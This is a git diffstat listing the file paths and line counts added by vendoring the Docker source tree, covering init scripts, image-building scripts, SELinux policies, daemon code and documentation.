 .../docker/contrib/init/openrc/docker.confd   |   13 +
 .../docker/contrib/init/openrc/docker.initd   |   22 +
 .../docker/contrib/init/systemd/REVIEWERS     |    3 +
 .../contrib/init/systemd/docker.service       |   29 +
 .../contrib/init/systemd/docker.service.rpm   |   28 +
 .../docker/contrib/init/systemd/docker.socket |   12 +
 .../contrib/init/sysvinit-debian/docker       |  152 +
 .../init/sysvinit-debian/docker.default       |   20 +
 .../contrib/init/sysvinit-redhat/docker       |  153 +
 .../init/sysvinit-redhat/docker.sysconfig     |    7 +
 .../docker/contrib/init/upstart/REVIEWERS     |    2 +
 .../docker/contrib/init/upstart/docker.conf   |   72 +
 .../docker/contrib/mac-install-bundle.sh      |   45 +
 .../docker/docker/contrib/mkimage-alpine.sh   |   87 +
 .../docker/contrib/mkimage-arch-pacman.conf   |   92 +
 .../docker/docker/contrib/mkimage-arch.sh     |  126 +
 .../contrib/mkimage-archarm-pacman.conf       |   98 +
 .../docker/docker/contrib/mkimage-busybox.sh  |   43 +
 .../docker/docker/contrib/mkimage-crux.sh     |   75 +
 .../docker/contrib/mkimage-debootstrap.sh     |  297 +
 .../docker/docker/contrib/mkimage-pld.sh      |   73 +
 .../docker/docker/contrib/mkimage-rinse.sh    |  123 +
 .../docker/docker/contrib/mkimage-yum.sh      |  136 +
 .../docker/docker/contrib/mkimage.sh          |  128 +
 .../contrib/mkimage/.febootstrap-minimize     |   28 +
 .../docker/contrib/mkimage/busybox-static     |   34 +
 .../docker/docker/contrib/mkimage/debootstrap |  226 +
 .../docker/contrib/mkimage/mageia-urpmi       |   61 +
 .../docker/docker/contrib/mkimage/rinse       |   25 +
 .../docker/docker/contrib/mkimage/solaris     |   89 +
 .../docker/docker/contrib/nnp-test/Dockerfile |    9 +
 .../docker/docker/contrib/nnp-test/nnp-test.c |   10 +
 .../docker/contrib/nuke-graph-directory.sh    |   64 +
 .../docker/docker/contrib/project-stats.sh    |   22 +
 .../docker/docker/contrib/report-issue.sh     |  105 +
 .../docker/docker/contrib/reprepro/suites.sh  |   12 +
 .../docker-engine-selinux/LICENSE             |  339 +
 .../docker-engine-selinux/Makefile            |   23 +
 .../docker-engine-selinux/README.md           |    1 +
 .../docker-engine-selinux/docker.fc           |   29 +
 .../docker-engine-selinux/docker.if           |  523 ++
 .../docker-engine-selinux/docker.te           |  399 +
 .../docker-engine-selinux/LICENSE             |  339 +
 .../docker-engine-selinux/Makefile            |   23 +
 .../docker-engine-selinux/README.md           |    1 +
 .../docker-engine-selinux/docker.fc           |   33 +
 .../docker-engine-selinux/docker.if           |  659 ++
 .../docker-engine-selinux/docker.te           |  465 +
 .../selinux/docker-engine-selinux/LICENSE     |  340 +
 .../selinux/docker-engine-selinux/Makefile    |   16 +
 .../selinux/docker-engine-selinux/docker.fc   |   18 +
 .../selinux/docker-engine-selinux/docker.if   |  461 +
 .../selinux/docker-engine-selinux/docker.te   |  407 +
 .../docker-engine-selinux/docker_selinux.8.gz |  Bin 0 -> 2847 bytes
 .../contrib/syntax/nano/Dockerfile.nanorc     |   26 +
 .../docker/contrib/syntax/nano/README.md      |   32 +
 .../Preferences/Dockerfile.tmPreferences      |   24 +
 .../Syntaxes/Dockerfile.tmLanguage            |  143 +
 .../textmate/Docker.tmbundle/info.plist       |   16 +
 .../docker/contrib/syntax/textmate/README.md  |   17 +
 .../docker/contrib/syntax/textmate/REVIEWERS  |    1 +
 .../docker/docker/contrib/syntax/vim/LICENSE  |   22 +
 .../docker/contrib/syntax/vim/README.md       |   26 +
 .../contrib/syntax/vim/doc/dockerfile.txt     |   18 +
 .../syntax/vim/ftdetect/dockerfile.vim        |    1 +
 .../contrib/syntax/vim/syntax/dockerfile.vim  |   31 +
 .../docker/contrib/syscall-test/Dockerfile    |   15 +
 .../docker/docker/contrib/syscall-test/acct.c |   16 +
 .../docker/contrib/syscall-test/exit32.s      |    7 +
 .../docker/docker/contrib/syscall-test/ns.c   |   63 +
 .../docker/docker/contrib/syscall-test/raw.c  |   14 +
 .../docker/contrib/syscall-test/setgid.c      |   11 +
 .../docker/contrib/syscall-test/setuid.c      |   11 +
 .../docker/contrib/syscall-test/socket.c      |   30 +
 .../docker/contrib/syscall-test/userns.c      |   63 +
 .../docker/contrib/udev/80-docker.rules       |    3 +
 .../docker/contrib/vagrant-docker/README.md   |   50 +
 .../docker/docker/daemon/apparmor_default.go  |   36 +
 .../daemon/apparmor_default_unsupported.go    |    7 +
 .../docker/docker/daemon/archive.go           |  436 +
 .../docker/docker/daemon/archive_unix.go      |   58 +
 .../docker/docker/daemon/archive_windows.go   |   18 +
 .../github.com/docker/docker/daemon/attach.go |  147 +
 .../github.com/docker/docker/daemon/auth.go   |   13 +
 .../docker/docker/daemon/bindmount_solaris.go |    5 +
 .../docker/docker/daemon/bindmount_unix.go    |    5 +
 .../github.com/docker/docker/daemon/cache.go  |  254 +
 .../docker/docker/daemon/caps/utils_unix.go   |  131 +
 .../docker/docker/daemon/changes.go           |   31 +
 .../docker/docker/daemon/checkpoint.go        |  110 +
 .../docker/docker/daemon/cluster.go           |   12 +
 .../docker/docker/daemon/cluster/cluster.go   | 1973 +++++
 .../daemon/cluster/convert/container.go       |  235 +
 .../docker/daemon/cluster/convert/network.go  |  210 +
 .../docker/daemon/cluster/convert/node.go     |   89 +
 .../docker/daemon/cluster/convert/secret.go   |   64 +
 .../docker/daemon/cluster/convert/service.go  |  366 +
 .../docker/daemon/cluster/convert/swarm.go    |  122 +
 .../docker/daemon/cluster/convert/task.go     |   81 +
 .../docker/daemon/cluster/executor/backend.go |   61 +
 .../cluster/executor/container/adapter.go     |  463 +
 .../cluster/executor/container/attachment.go  |   81 +
 .../cluster/executor/container/container.go   |  598 ++
 .../cluster/executor/container/controller.go  |  672 ++
 .../cluster/executor/container/errors.go      |   15 +
 .../cluster/executor/container/executor.go    |  194 +
 .../cluster/executor/container/health_test.go |  102 +
 .../cluster/executor/container/validate.go    |   39 +
 .../executor/container/validate_test.go       |  141 +
 .../executor/container/validate_unix_test.go  |    8 +
 .../container/validate_windows_test.go        |    8 +
 .../docker/docker/daemon/cluster/filters.go   |  116 +
 .../docker/docker/daemon/cluster/helpers.go   |  108 +
 .../docker/daemon/cluster/listen_addr.go      |  278 +
 .../daemon/cluster/listen_addr_linux.go       |   91 +
 .../daemon/cluster/listen_addr_others.go      |    9 +
 .../daemon/cluster/listen_addr_solaris.go     |   57 +
 .../docker/daemon/cluster/provider/network.go |   37 +
 .../docker/docker/daemon/cluster/secrets.go   |  133 +
 .../github.com/docker/docker/daemon/commit.go |  271 +
 .../github.com/docker/docker/daemon/config.go |  525 ++
 .../docker/daemon/config_common_unix.go       |   90 +
 .../docker/daemon/config_experimental.go      |    8 +
 .../docker/docker/daemon/config_solaris.go    |   47 +
 .../docker/docker/daemon/config_test.go       |  229 +
 .../docker/docker/daemon/config_unix.go       |  104 +
 .../docker/docker/daemon/config_unix_test.go  |   80 +
 .../docker/docker/daemon/config_windows.go    |   71 +
 .../docker/daemon/config_windows_test.go      |   59 +
 .../docker/docker/daemon/container.go         |  282 +
 .../docker/daemon/container_operations.go     | 1049 +++
 .../daemon/container_operations_solaris.go    |   46 +
 .../daemon/container_operations_unix.go       |  281 +
 .../daemon/container_operations_windows.go    |   59 +
 .../github.com/docker/docker/daemon/create.go |  290 +
 .../docker/docker/daemon/create_unix.go       |   81 +
 .../docker/docker/daemon/create_windows.go    |   80 +
 .../github.com/docker/docker/daemon/daemon.go | 1321 +++
 .../docker/daemon/daemon_experimental.go      |    7 +
 .../docker/docker/daemon/daemon_linux.go      |   80 +
 .../docker/docker/daemon/daemon_linux_test.go |  104 +
 .../docker/docker/daemon/daemon_solaris.go    |  523 ++
 .../docker/docker/daemon/daemon_test.go       |  627 ++
 .../docker/docker/daemon/daemon_unix.go       | 1237 +++
 .../docker/docker/daemon/daemon_unix_test.go  |  283 +
 .../docker/daemon/daemon_unsupported.go       |    5 +
 .../docker/docker/daemon/daemon_windows.go    |  604 ++
 .../docker/docker/daemon/debugtrap.go         |   62 +
 .../docker/docker/daemon/debugtrap_unix.go    |   33 +
 .../docker/daemon/debugtrap_unsupported.go    |    7 +
 .../docker/docker/daemon/debugtrap_windows.go |   52 +
 .../github.com/docker/docker/daemon/delete.go |  168 +
 .../docker/docker/daemon/delete_test.go       |   43 +
 .../docker/docker/daemon/discovery.go         |  215 +
 .../docker/docker/daemon/discovery_test.go    |  164 +
 .../docker/docker/daemon/disk_usage.go        |  100 +
 .../github.com/docker/docker/daemon/errors.go |   57 +
 .../github.com/docker/docker/daemon/events.go |  132 +
 .../docker/docker/daemon/events/events.go     |  158 +
 .../docker/daemon/events/events_test.go       |  275 +
 .../docker/docker/daemon/events/filter.go     |  110 +
 .../docker/docker/daemon/events/metrics.go    |   15 +
 .../daemon/events/testutils/testutils.go      |   76 +
 .../docker/docker/daemon/events_test.go       |   94 +
 .../github.com/docker/docker/daemon/exec.go   |  280 +
 .../docker/docker/daemon/exec/exec.go         |  118 +
 .../docker/docker/daemon/exec_linux.go        |   27 +
 .../docker/docker/daemon/exec_solaris.go      |   11 +
 .../docker/docker/daemon/exec_windows.go      |   14 +
 .../github.com/docker/docker/daemon/export.go |   60 +
 .../docker/docker/daemon/getsize_unix.go      |   41 +
 .../docker/daemon/graphdriver/aufs/aufs.go    |  669 ++
 .../daemon/graphdriver/aufs/aufs_test.go      |  802 ++
 .../docker/daemon/graphdriver/aufs/dirs.go    |   64 +
 .../docker/daemon/graphdriver/aufs/mount.go   |   21 +
 .../daemon/graphdriver/aufs/mount_linux.go    |    7 +
 .../graphdriver/aufs/mount_unsupported.go     |   12 +
 .../docker/daemon/graphdriver/btrfs/btrfs.go  |  530 ++
 .../daemon/graphdriver/btrfs/btrfs_test.go    |   63 +
 .../graphdriver/btrfs/dummy_unsupported.go    |    3 +
 .../daemon/graphdriver/btrfs/version.go       |   26 +
 .../daemon/graphdriver/btrfs/version_none.go  |   14 +
 .../daemon/graphdriver/btrfs/version_test.go  |   13 +
 .../docker/daemon/graphdriver/counter.go      |   67 +
 .../daemon/graphdriver/devmapper/README.md    |   96 +
 .../daemon/graphdriver/devmapper/deviceset.go | 2727 ++++++
 .../graphdriver/devmapper/devmapper_doc.go    |  106 +
 .../graphdriver/devmapper/devmapper_test.go   |  110 +
 .../daemon/graphdriver/devmapper/driver.go    |  231 +
 .../daemon/graphdriver/devmapper/mount.go     |   89 +
 .../docker/daemon/graphdriver/driver.go       |  270 +
 .../daemon/graphdriver/driver_freebsd.go      |   19 +
 .../docker/daemon/graphdriver/driver_linux.go |  135 +
 .../daemon/graphdriver/driver_solaris.go      |   97 +
 .../daemon/graphdriver/driver_unsupported.go  |   15 +
 .../daemon/graphdriver/driver_windows.go      |   14 +
 .../docker/daemon/graphdriver/fsdiff.go       |  169 +
 .../graphdriver/graphtest/graphbench_unix.go  |  259 +
 .../graphdriver/graphtest/graphtest_unix.go   |  358 +
 .../graphtest/graphtest_windows.go            |    1 +
 .../daemon/graphdriver/graphtest/testutil.go  |  342 +
 .../graphdriver/graphtest/testutil_unix.go    |  143 +
 .../docker/daemon/graphdriver/overlay/copy.go |  174 +
 .../daemon/graphdriver/overlay/overlay.go     |  462 +
 .../graphdriver/overlay/overlay_test.go       |   93 +
 .../overlay/overlay_unsupported.go            |    3 +
 .../daemon/graphdriver/overlay2/check.go      |   79 +
 .../daemon/graphdriver/overlay2/mount.go      |   88 +
 .../daemon/graphdriver/overlay2/overlay.go    |  662 ++
 .../graphdriver/overlay2/overlay_test.go      |  121 +
 .../overlay2/overlay_unsupported.go           |    3 +
 .../daemon/graphdriver/overlay2/randomid.go   |   80 +
 .../graphdriver/overlayutils/overlayutils.go  |   18 +
 .../docker/daemon/graphdriver/plugin.go       |   43 +
 .../docker/docker/daemon/graphdriver/proxy.go |  252 +
 .../daemon/graphdriver/quota/projectquota.go  |  339 +
 .../graphdriver/register/register_aufs.go     |    8 +
 .../graphdriver/register/register_btrfs.go    |    8 +
 .../register/register_devicemapper.go         |    8 +
 .../graphdriver/register/register_overlay.go  |    9 +
 .../graphdriver/register/register_vfs.go      |    6 +
 .../graphdriver/register/register_windows.go  |    6 +
 .../graphdriver/register/register_zfs.go      |    8 +
 .../docker/daemon/graphdriver/vfs/driver.go   |  145 +
 .../docker/daemon/graphdriver/vfs/vfs_test.go |   37 +
 .../daemon/graphdriver/windows/windows.go     |  886 ++
 .../docker/daemon/graphdriver/zfs/MAINTAINERS |    2 +
 .../docker/daemon/graphdriver/zfs/zfs.go      |  417 +
 .../daemon/graphdriver/zfs/zfs_freebsd.go     |   38 +
 .../daemon/graphdriver/zfs/zfs_linux.go       |   27 +
 .../daemon/graphdriver/zfs/zfs_solaris.go     |   59 +
 .../docker/daemon/graphdriver/zfs/zfs_test.go |   35 +
 .../daemon/graphdriver/zfs/zfs_unsupported.go |   11 +
 .../github.com/docker/docker/daemon/health.go |  341 +
 .../docker/docker/daemon/health_test.go       |  118 +
 .../github.com/docker/docker/daemon/image.go  |   76 +
 .../docker/docker/daemon/image_delete.go      |  412 +
 .../docker/docker/daemon/image_exporter.go    |   25 +
 .../docker/docker/daemon/image_history.go     |   84 +
 .../docker/docker/daemon/image_inspect.go     |   82 +
 .../docker/docker/daemon/image_pull.go        |  149 +
 .../docker/docker/daemon/image_push.go        |   63 +
 .../docker/docker/daemon/image_tag.go         |   37 +
 .../github.com/docker/docker/daemon/images.go |  331 +
 .../github.com/docker/docker/daemon/import.go |  135 +
 .../github.com/docker/docker/daemon/info.go   |  180 +
 .../docker/docker/daemon/info_unix.go         |   82 +
 .../docker/docker/daemon/info_windows.go      |   10 +
 .../docker/daemon/initlayer/setup_solaris.go  |   13 +
 .../docker/daemon/initlayer/setup_unix.go     |   69 +
 .../docker/daemon/initlayer/setup_windows.go  |   13 +
 .../docker/docker/daemon/inspect.go           |  264 +
 .../docker/docker/daemon/inspect_solaris.go   |   41 +
 .../docker/docker/daemon/inspect_unix.go      |   92 +
 .../docker/docker/daemon/inspect_windows.go   |   41 +
 .../github.com/docker/docker/daemon/keys.go   |   59 +
 .../docker/docker/daemon/keys_unsupported.go  |    8 +
 .../github.com/docker/docker/daemon/kill.go   |  164 +
 .../github.com/docker/docker/daemon/links.go  |   87 +
 .../docker/docker/daemon/links/links.go       |  141 +
 .../docker/docker/daemon/links/links_test.go  |  213 +
 .../docker/docker/daemon/links_linux.go       |   72 +
 .../docker/docker/daemon/links_linux_test.go  |   98 +
 .../docker/docker/daemon/links_notlinux.go    |   10 +
 .../github.com/docker/docker/daemon/list.go   |  660 ++
 .../docker/docker/daemon/list_unix.go         |   11 +
 .../docker/docker/daemon/list_windows.go      |   20 +
 .../docker/docker/daemon/logdrivers_linux.go  |   15 +
 .../docker/daemon/logdrivers_windows.go       |   13 +
 .../daemon/logger/awslogs/cloudwatchlogs.go   |  404 +
 .../logger/awslogs/cloudwatchlogs_test.go     |  724 ++
 .../logger/awslogs/cwlogsiface_mock_test.go   |   77 +
 .../docker/docker/daemon/logger/context.go    |  111 +
 .../docker/docker/daemon/logger/copier.go     |  131 +
 .../docker/daemon/logger/copier_test.go       |  296 +
 .../daemon/logger/etwlogs/etwlogs_windows.go  |  170 +
 .../docker/docker/daemon/logger/factory.go    |  104 +
 .../docker/daemon/logger/fluentd/fluentd.go   |  246 +
 .../daemon/logger/gcplogs/gcplogging.go       |  200 +
 .../docker/docker/daemon/logger/gelf/gelf.go  |  209 +
 .../daemon/logger/gelf/gelf_unsupported.go    |    3 +
 .../docker/daemon/logger/journald/journald.go |  122 +
 .../daemon/logger/journald/journald_test.go   |   23 +
 .../logger/journald/journald_unsupported.go   |    6 +
 .../docker/daemon/logger/journald/read.go     |  401 +
 .../daemon/logger/journald/read_native.go     |    6 +
 .../logger/journald/read_native_compat.go     |    6 +
 .../logger/journald/read_unsupported.go       |    7 +
 .../daemon/logger/jsonfilelog/jsonfilelog.go  |  151 +
 .../logger/jsonfilelog/jsonfilelog_test.go    |  248 +
 .../docker/daemon/logger/jsonfilelog/read.go  |  319 +
 .../daemon/logger/logentries/logentries.go    |   94 +
 .../docker/docker/daemon/logger/logger.go     |  134 +
 .../docker/daemon/logger/logger_test.go       |   26 +
 .../daemon/logger/loggerutils/log_tag.go      |   31 +
 .../daemon/logger/loggerutils/log_tag_test.go |   47 +
 .../logger/loggerutils/rotatefilewriter.go    |  124 +
 .../docker/daemon/logger/splunk/splunk.go     |  621 ++
 .../daemon/logger/splunk/splunk_test.go       | 1302 +++
 .../logger/splunk/splunkhecmock_test.go       |  157 +
 .../docker/daemon/logger/syslog/syslog.go     |  262 +
 .../daemon/logger/syslog/syslog_test.go       |   62 +
 .../github.com/docker/docker/daemon/logs.go   |  142 +
 .../docker/docker/daemon/logs_test.go         |   15 +
 .../docker/docker/daemon/metrics.go           |   42 +
 .../docker/docker/daemon/monitor.go           |  132 +
 .../docker/docker/daemon/monitor_linux.go     |   19 +
 .../docker/docker/daemon/monitor_solaris.go   |   18 +
 .../docker/docker/daemon/monitor_windows.go   |   46 +
 .../github.com/docker/docker/daemon/mounts.go |   48 +
 .../github.com/docker/docker/daemon/names.go  |  116 +
 .../docker/docker/daemon/network.go           |  498 ++
 .../docker/docker/daemon/network/settings.go  |   33 +
 .../docker/docker/daemon/oci_linux.go         |  790 ++
 .../docker/docker/daemon/oci_solaris.go       |  188 +
 .../docker/docker/daemon/oci_windows.go       |  122 +
 .../github.com/docker/docker/daemon/pause.go  |   49 +
 .../github.com/docker/docker/daemon/prune.go  |  236 +
 .../github.com/docker/docker/daemon/rename.go |  122 +
 .../github.com/docker/docker/daemon/resize.go |   40 +
 .../docker/docker/daemon/restart.go           |   70 +
 .../github.com/docker/docker/daemon/search.go |   94 +
 .../docker/docker/daemon/search_test.go       |  358 +
 .../docker/docker/daemon/seccomp_disabled.go  |   19 +
 .../docker/docker/daemon/seccomp_linux.go     |   55 +
 .../docker/daemon/seccomp_unsupported.go      |    5 +
 .../docker/docker/daemon/secrets.go           |   36 +
 .../docker/docker/daemon/secrets_linux.go     |    7 +
 .../docker/daemon/secrets_unsupported.go      |    7 +
 .../docker/docker/daemon/selinux_linux.go     |   17 +
 .../docker/daemon/selinux_unsupported.go      |   13 +
 .../github.com/docker/docker/daemon/start.go  |  230 +
 .../docker/docker/daemon/start_unix.go        |   31 +
 .../docker/docker/daemon/start_windows.go     |  205 +
 .../github.com/docker/docker/daemon/stats.go  |  158 +
 .../docker/docker/daemon/stats_collector.go   |  132 +
 .../docker/daemon/stats_collector_solaris.go  |   34 +
 .../docker/daemon/stats_collector_unix.go     |   71 +
 .../docker/daemon/stats_collector_windows.go  |   15 +
 .../docker/docker/daemon/stats_unix.go        |   58 +
 .../docker/docker/daemon/stats_windows.go     |   11 +
 .../github.com/docker/docker/daemon/stop.go   |   83 +
 .../docker/docker/daemon/top_unix.go          |  126 +
 .../docker/docker/daemon/top_unix_test.go     |   76 +
 .../docker/docker/daemon/top_windows.go       |   53 +
 .../docker/docker/daemon/unpause.go           |   38 +
 .../github.com/docker/docker/daemon/update.go |   92 +
 .../docker/docker/daemon/update_linux.go      |   25 +
 .../docker/docker/daemon/update_solaris.go    |   11 +
 .../docker/docker/daemon/update_windows.go    |   13 +
 .../docker/docker/daemon/volumes.go           |  303 +
 .../docker/docker/daemon/volumes_unit_test.go |   39 +
 .../docker/docker/daemon/volumes_unix.go      |  219 +
 .../docker/docker/daemon/volumes_windows.go   |   47 +
 .../github.com/docker/docker/daemon/wait.go   |   32 +
 .../docker/docker/daemon/workdir.go           |   21 +
 .../docker/docker/distribution/config.go      |  241 +
 .../docker/docker/distribution/errors.go      |  159 +
 .../fixtures/validate_manifest/bad_manifest   |   38 +
 .../validate_manifest/extra_data_manifest     |   46 +
 .../fixtures/validate_manifest/good_manifest  |   38 +
 .../docker/distribution/metadata/metadata.go  |   75 +
 .../distribution/metadata/v1_id_service.go    |   51 +
 .../metadata/v1_id_service_test.go            |   83 +
 .../metadata/v2_metadata_service.go           |  241 +
 .../metadata/v2_metadata_service_test.go      |  115 +
 .../docker/docker/distribution/pull.go        |  200 +
 .../docker/docker/distribution/pull_v1.go     |  368 +
 .../docker/docker/distribution/pull_v2.go     |  878 ++
 .../docker/distribution/pull_v2_test.go       |  183 +
 .../docker/distribution/pull_v2_unix.go       |   13 +
 .../docker/distribution/pull_v2_windows.go    |   49 +
 .../docker/docker/distribution/push.go        |  186 +
 .../docker/docker/distribution/push_v1.go     |  463 +
 .../docker/docker/distribution/push_v2.go     |  697 ++
 .../docker/distribution/push_v2_test.go       |  579 ++
 .../docker/docker/distribution/registry.go    |  156 +
 .../docker/distribution/registry_unit_test.go |  136 +
 .../docker/distribution/utils/progress.go     |   44 +
 .../docker/distribution/xfer/download.go      |  452 +
 .../docker/distribution/xfer/download_test.go |  356 +
 .../docker/distribution/xfer/transfer.go      |  401 +
 .../docker/distribution/xfer/transfer_test.go |  410 +
 .../docker/docker/distribution/xfer/upload.go |  168 +
 .../docker/distribution/xfer/upload_test.go   |  134 +
 .../docker/docker/dockerversion/useragent.go  |   74 +
 .../docker/dockerversion/version_lib.go       |   16 +
 .../github.com/docker/docker/docs/README.md   |   30 +
 .../docker/docker/docs/api/v1.18.md           | 2156 +++++
 .../docker/docker/docs/api/v1.19.md           | 2238 +++++
 .../docker/docker/docs/api/v1.20.md           | 2391 +++++
 .../docker/docker/docs/api/v1.21.md           | 2969 +++++++
 .../docker/docker/docs/api/v1.22.md           | 3307 +++++++
 .../docker/docker/docs/api/v1.23.md           | 3424 ++++++++
 .../docker/docker/docs/api/v1.24.md           | 5316 +++++++++++
 .../docker/docker/docs/api/version-history.md |  249 +
 .../docker/docker/docs/deprecated.md          |  286 +
 .../docker/docker/docs/extend/EBS_volume.md   |  164 +
 .../docker/docker/docs/extend/config.md       |  225 +
 .../extend/images/authz_additional_info.png   |  Bin 0 -> 45916 bytes
 .../docker/docs/extend/images/authz_allow.png |  Bin 0 -> 33505 bytes
 .../docs/extend/images/authz_chunked.png      |  Bin 0 -> 33168 bytes
 .../extend/images/authz_connection_hijack.png |  Bin 0 -> 38780 bytes
 .../docker/docs/extend/images/authz_deny.png  |  Bin 0 -> 27099 bytes
 .../docker/docker/docs/extend/index.md        |  222 +
 .../docker/docs/extend/legacy_plugins.md      |   98 +
 .../docker/docker/docs/extend/plugin_api.md   |  196 +
 .../docs/extend/plugins_authorization.md      |  260 +
 .../docker/docs/extend/plugins_graphdriver.md |  376 +
 .../docker/docs/extend/plugins_network.md     |   77 +
 .../docker/docs/extend/plugins_volume.md      |  276 +
 .../docker/docker/docs/reference/builder.md   | 1746 ++++
 .../docs/reference/commandline/attach.md      |  131 +
 .../docs/reference/commandline/build.md       |  451 +
 .../docker/docs/reference/commandline/cli.md  |  249 +
 .../docs/reference/commandline/commit.md      |   93 +
 .../reference/commandline/container_prune.md  |   47 +
 .../docker/docs/reference/commandline/cp.md   |  112 +
 .../docs/reference/commandline/create.md      |  211 +
 .../docs/reference/commandline/deploy.md      |  101 +
 .../docker/docs/reference/commandline/diff.md |   48 +
 .../reference/commandline/docker_images.gif   |  Bin 0 -> 35785 bytes
 .../docs/reference/commandline/dockerd.md     | 1364 +++
 .../docs/reference/commandline/events.md      |  217 +
 .../docker/docs/reference/commandline/exec.md |   65 +
 .../docs/reference/commandline/export.md      |   43 +
 .../docs/reference/commandline/history.md     |   48 +
 .../docs/reference/commandline/image_prune.md |   71 +
 .../docs/reference/commandline/images.md      |  304 +
 .../docs/reference/commandline/import.md      |   75 +
 .../docs/reference/commandline/index.md       |  178 +
 .../docker/docs/reference/commandline/info.md |  224 +
 .../docs/reference/commandline/inspect.md     |  102 +
 .../docker/docs/reference/commandline/kill.md |   34 +
 .../docker/docs/reference/commandline/load.md |   53 +
 .../docs/reference/commandline/login.md       |  122 +
 .../docs/reference/commandline/logout.md      |   30 +
 .../docker/docs/reference/commandline/logs.md |   66 +
 .../docker/docs/reference/commandline/menu.md |   28 +
 .../reference/commandline/network_connect.md  |  100 +
 .../reference/commandline/network_create.md   |  202 +
 .../commandline/network_disconnect.md         |   43 +
 .../reference/commandline/network_inspect.md  |  192 +
 .../docs/reference/commandline/network_ls.md  |  218 +
 .../reference/commandline/network_prune.md    |   45 +
 .../docs/reference/commandline/network_rm.md  |   59 +
 .../docs/reference/commandline/node_demote.md |   42 +
 .../reference/commandline/node_inspect.md     |  137 +
 .../docs/reference/commandline/node_ls.md     |  130 +
 .../reference/commandline/node_promote.md     |   41 +
 .../docs/reference/commandline/node_ps.md     |  107 +
 .../docs/reference/commandline/node_rm.md     |   73 +
 .../docs/reference/commandline/node_update.md |   71 +
 .../docs/reference/commandline/pause.md       |   40 +
 .../reference/commandline/plugin_create.md    |   60 +
 .../reference/commandline/plugin_disable.md   |   66 +
 .../reference/commandline/plugin_enable.md    |   65 +
 .../reference/commandline/plugin_inspect.md   |  164 +
 .../reference/commandline/plugin_install.md   |   71 +
 .../docs/reference/commandline/plugin_ls.md   |   53 +
 .../docs/reference/commandline/plugin_push.md |   50 +
 .../docs/reference/commandline/plugin_rm.md   |   56 +
 .../docs/reference/commandline/plugin_set.md  |   99 +
 .../reference/commandline/plugin_upgrade.md   |   84 +
 .../docker/docs/reference/commandline/port.md |   41 +
 .../docker/docs/reference/commandline/ps.md   |  384 +
 .../docker/docs/reference/commandline/pull.md |  252 +
 .../docker/docs/reference/commandline/push.md |   75 +
 .../docs/reference/commandline/rename.md      |   27 +
 .../docs/reference/commandline/restart.md     |   26 +
 .../docker/docs/reference/commandline/rm.md   |   69 +
 .../docker/docs/reference/commandline/rmi.md  |   83 +
 .../docker/docs/reference/commandline/run.md  |  732 ++
 .../docker/docs/reference/commandline/save.md |   45 +
 .../docs/reference/commandline/search.md      |  134 +
 .../reference/commandline/secret_create.md    |   90 +
 .../reference/commandline/secret_inspect.md   |   85 +
 .../docs/reference/commandline/secret_ls.md   |   43 +
 .../docs/reference/commandline/secret_rm.md   |   48 +
 .../reference/commandline/service_create.md   |  556 ++
 .../reference/commandline/service_inspect.md  |  162 +
 .../reference/commandline/service_logs.md     |   77 +
 .../docs/reference/commandline/service_ls.md  |  114 +
 .../docs/reference/commandline/service_ps.md  |  161 +
 .../docs/reference/commandline/service_rm.md  |   55 +
 .../reference/commandline/service_scale.md    |   96 +
 .../reference/commandline/service_update.md   |  181 +
 .../reference/commandline/stack_deploy.md     |   98 +
 .../docs/reference/commandline/stack_ls.md    |   47 +
 .../docs/reference/commandline/stack_ps.md    |   51 +
 .../docs/reference/commandline/stack_rm.md    |   38 +
 .../reference/commandline/stack_services.md   |   70 +
 .../docs/reference/commandline/start.md       |   28 +
 .../docs/reference/commandline/stats.md       |  117 +
 .../docker/docs/reference/commandline/stop.md |   29 +
 .../docs/reference/commandline/swarm_init.md  |  142 +
 .../docs/reference/commandline/swarm_join.md  |  102 +
 .../reference/commandline/swarm_join_token.md |  105 +
 .../docs/reference/commandline/swarm_leave.md |   58 +
 .../reference/commandline/swarm_unlock.md     |   41 +
 .../reference/commandline/swarm_unlock_key.md |   84 +
 .../reference/commandline/swarm_update.md     |   45 +
 .../docs/reference/commandline/system_df.md   |   76 +
 .../reference/commandline/system_prune.md     |   79 +
 .../docker/docs/reference/commandline/tag.md  |   74 +
 .../docker/docs/reference/commandline/top.md  |   25 +
 .../docs/reference/commandline/unpause.md     |   36 +
 .../docs/reference/commandline/update.md      |  120 +
 .../docs/reference/commandline/version.md     |   67 +
 .../reference/commandline/volume_create.md    |   91 +
 .../reference/commandline/volume_inspect.md   |   59 +
 .../docs/reference/commandline/volume_ls.md   |  183 +
 .../reference/commandline/volume_prune.md     |   54 +
 .../docs/reference/commandline/volume_rm.md   |   42 +
 .../docker/docs/reference/commandline/wait.md |   25 +
 .../docker/docker/docs/reference/glossary.md  |  286 +
 .../docker/docker/docs/reference/index.md     |   21 +
 .../docker/docker/docs/reference/run.md       | 1555 ++++
 .../docker/docs/static_files/contributors.png |  Bin 0 -> 23100 bytes
 .../static_files/docker-logo-compressed.png   |  Bin 0 -> 4972 bytes
 .../docker/docker/experimental/README.md      |   44 +
 .../docker/experimental/checkpoint-restore.md |   88 +
 .../experimental/docker-stacks-and-bundles.md |  202 +
 .../experimental/images/ipvlan-l3.gliffy      |    1 +
 .../docker/experimental/images/ipvlan-l3.png  |  Bin 0 -> 18260 bytes
 .../docker/experimental/images/ipvlan-l3.svg  |    1 +
 .../images/ipvlan_l2_simple.gliffy            |    1 +
 .../experimental/images/ipvlan_l2_simple.png  |  Bin 0 -> 20145 bytes
 .../experimental/images/ipvlan_l2_simple.svg  |    1 +
 .../images/macvlan-bridge-ipvlan-l2.gliffy    |    1 +
 .../images/macvlan-bridge-ipvlan-l2.png       |  Bin 0 -> 14527 bytes
 .../images/macvlan-bridge-ipvlan-l2.svg       |    1 +
 .../images/multi_tenant_8021q_vlans.gliffy    |    1 +
 .../images/multi_tenant_8021q_vlans.png       |  Bin 0 -> 17879 bytes
 .../images/multi_tenant_8021q_vlans.svg       |    1 +
 .../images/vlans-deeper-look.gliffy           |    1 +
 .../experimental/images/vlans-deeper-look.png |  Bin 0 -> 38837 bytes
 .../experimental/images/vlans-deeper-look.svg |    1 +
 .../docker/experimental/vlan-networks.md      |  471 +
 .../docker/hack/Jenkins/W2L/postbuild.sh      |   35 +
 .../docker/docker/hack/Jenkins/W2L/setup.sh   |  309 +
 .../docker/docker/hack/Jenkins/readme.md      |    3 +
 vendor/github.com/docker/docker/hack/dind     |   33 +
 .../docker/hack/dockerfile/binaries-commits   |   11 +
 .../hack/dockerfile/install-binaries.sh       |  123 +
 .../docker/docker/hack/generate-authors.sh    |   15 +
 .../docker/hack/generate-swagger-api.sh       |   22 +
